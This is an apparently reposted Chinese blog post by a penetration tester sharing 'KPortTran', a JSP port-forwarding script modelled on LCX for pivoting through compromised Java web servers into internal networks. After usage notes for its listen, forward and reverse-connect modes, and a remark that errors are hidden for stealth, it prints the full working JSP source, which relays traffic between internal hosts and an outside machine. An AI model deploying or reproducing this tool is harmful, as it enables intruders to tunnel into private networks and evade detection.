最近接触内网很多，渗透过程中，由于windows和linux的差别以及运行语言环境的限制导致端口转发经常出现问题。于是自己写了个简单的JSP的端口转发脚本。仿造LCX的功能，具有正向、反向、监听三种模式。对于目前数量众多的JAVA WEB网站来说，可以比较方便的实现端口转发。

 

在这里发布出来，小伙伴们使用过程中，如果发现什么bug欢迎提交~

 

---

用法如下 KPortTran Usage：

---

参数

xxx.com/KPortTran.? lip = local ip / 本地ip //一般为内网主机IP lp = local port / 本地端口 //一般为内网主机端口 rip = remote ip / 远程ip //一般为外网连接者IP，或者内网其他主机 rp = remote port / 远程端口 //一般为外网连接者端口 lp2 = local port2 / 本地端口2 //本地监听转发时的第二个端口 m = mode / 运行模式 //合法的值有：listen tran slave三种

---

运行模式

m = listen 需要参数:lp、lp2 该模式下，会在本地监听两个端口，相互转发数据 m = tran 需要参数：lip、lp、rip、rp 该模式为正向转发下，会在本地的lip上监听lp端口，当有连接建立时，再连接rip的rp端口。并将lip的lp上接收到的数据发向rip主机的rp端口。 m = slave 需要的参数： lip、lp、rip、rp 该模式为反向转发，会分别连接主机lip的lp端口 和 主机rip的rp端口。并转发两者数据，可用于内网反连。

---

注意事项： 某些server上使用时，可能由于编码问题会报错，请根据实际情况，更改代码首行的编码设置。 为了隐蔽，没有设置错误信息返回。如果不能执行，请检查一下参数。

测试截图：

 

<%@page pageEncoding="GBK"%><%@page import="java.io.*"%><%@page import="java.util.*"%><%@page import="java.nio.charset.*"%><%@page import="javax.servlet.http.HttpServletRequestWrapper"%><%@page import="java.net.*"%><%/*code by KingX*/class KPortTran {	public void listen(String port1, String port2) {		ServerSocket listenServerSocket = null;		ServerSocket outServerSocket = null;		try {			listenServerSocket = new ServerSocket(Integer.parseInt(port1));			outServerSocket = new ServerSocket(Integer.parseInt(port2));		} catch (NumberFormatException e) {					} catch (IOException e) {		}		Socket listenSocket = null;		Socket outSocket = null;		try {			while (true) {					listenSocket = listenServerSocket.accept();				outSocket = outServerSocket.accept();				new tranThread(outSocket, listenSocket).start();				new tranThread(listenSocket, outSocket).start();				Thread.sleep(200);			}		} catch (Exception e) {		  }	}	public void slave(String targetIP, String port1, String srcIP, String port2) throws IOException {		InetAddress src = InetAddress.getByName(srcIP);		InetAddress dest = InetAddress.getByName(targetIP);		int p1 = Integer.parseInt(port1);		int p2 = Integer.parseInt(port2);		new Server(src, p2, dest, p1, true);	}	public void tran(String srcIP, String port1, String targetIP, String port2)			throws NumberFormatException, IOException {		InetAddress src = InetAddress.getByName(srcIP);		InetAddress dest = InetAddress.getByName(targetIP);		int p1 = Integer.parseInt(port1);		int p2 = Integer.parseInt(port2);		new Server(src, p1, dest, p2, false);	}class tranThread extends Thread {	Socket in;	Socket out;	InputStream is;	OutputStream os;	public tranThread(Socket in, Socket out) throws IOException {		this.is = in.getInputStream();		this.os = out.getOutputStream();		this.in = in;		this.out = out;	}	private void closeSocket() {		try {			is.close();			os.close();			in.close();			out.close();		} catch (IOException e) {		}	}	@Override	public void run() {		super.run();		byte[] buffer = new byte[4096];		int len = -1;		try {			while (true) {				if (in.isClosed() || out.isClosed()|| (len = is.read(buffer, 0, buffer.length)) == -1) {					break;				} else {					os.write(buffer, 0, len);					os.flush();					}			}		} catch (IOException e) {			closeSocket();		} finally {			closeSocket();		}	}}class Server extends Thread {	InetAddress src;	InetAddress dest;	int p1, p2;	boolean reverse = false;		public Server(InetAddress srcIP, int srcPort, InetAddress targetIP,			int targetPort, boolean flag) {		this.src = srcIP;		this.dest = targetIP;		this.p1 = srcPort;		this.p2 = targetPort;		this.reverse = flag;		start();	}	@Override	public void run() {		super.run();		if (reverse) {			try {				Socket s = new Socket(src, p1);				Socket s2 = new Socket(dest, p2);				new tranThread(s, s2).start();				new tranThread(s2, s).start();				while (true) {					if (s2.isClosed() || s.isClosed()) {						if (s2.isClosed()) {							s2 = new Socket(dest, p2);						}						if (s.isClosed()) {							s = new Socket(src, p1);						}						new tranThread(s, s2).start();						new tranThread(s2, s).start();					}					Thread.sleep(1000);				}			} catch (IOException e) {			} catch (InterruptedException e) {			}		} else {			ServerSocket ss;			try {				ss = new ServerSocket(p1, 5, src);				while (true) {					Socket s = ss.accept();					Socket s2 = new Socket(dest, p2);					new tranThread(s, s2).start();					new tranThread(s2, s).start();				}			} catch (IOException e) {				e.printStackTrace();			}		}	}}}%><%final String localIP = request.getParameter("lip");final String localPort = request.getParameter("lp");final String localPort2 = request.getParameter("lp2");final String remoteIP =request.getParameter("rip");final String remotePort =request.getParameter("rp");final String mode =request.getParameter("m");KPortTran pt = new KPortTran();if (mode.equals("tran")) {	pt.tran(localIP, localPort, remoteIP , remotePort);}if (mode.equals("slave")) {	pt.slave(localIP, localPort, remoteIP , remotePort);}if (mode.equals("listen")) {	pt.listen(localPort, localPort2);}%> 本文转载至，